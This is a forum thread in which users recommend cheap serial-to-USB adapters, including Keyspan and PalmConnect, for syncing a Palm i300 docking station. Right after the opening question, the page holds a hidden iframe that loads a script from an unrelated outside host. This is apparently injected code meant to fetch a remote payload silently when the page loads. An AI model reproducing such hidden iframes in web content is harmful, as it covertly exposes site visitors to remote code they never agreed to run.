    Question Serial To USB

I just migrated to a laptop without a serial port. Does any know of a small and cheap Serial to USB convertor for the I300 docking station?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Talking serial to USB solution (Mac OS X)

I'm using a Keyspan PDA USB to serial adapter to connect my i300 to my iMac running Palm Desktop 4.0 on OS X. Everything communicates beautifully!

Be sure to download the latest drivers from the Keyspan website.

Go to any computer supply store (CompUSA, etc). Go look at the USB hubs. Several have serial ports. There used to be some devices that didn't like the conversion but I suspect the bugs are out now.

It really eats up the batteries though.

IF you happen to have one on your laptop.

    Palm sells one...

You can buy a Palm brand "PalmConnect USB Kit". It was $29 at my local Best Buy. The box lists various "Palm" models but it's just a serial to a USB. Designed for Windows and Macintosh.

It worked okay on my Mac, I switched it to a old PC (dedicated to syncing) so all the conduits were there.
